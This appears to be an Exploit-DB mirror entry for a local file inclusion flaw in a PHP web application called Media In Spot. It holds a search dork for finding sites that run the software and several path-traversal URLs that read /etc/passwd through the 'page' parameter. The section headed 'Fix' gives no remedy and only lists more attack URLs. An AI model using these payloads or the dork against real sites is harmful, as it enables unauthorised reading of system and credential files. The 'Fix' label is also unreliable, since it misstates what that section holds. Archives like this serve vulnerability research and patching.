exploit-db-mirror/platforms/php/webapps/17292.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

25 lines
No EOL
907 B
Text
Executable file

#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:http://www.mediainspot.com/
#Dork:"
"Powred By Media In Spot""
#Author : wlhaan haker <iit[at]hotmail.com>
###############################################################################################################
Exploit:
http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################################################################
Fix:
demo
http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd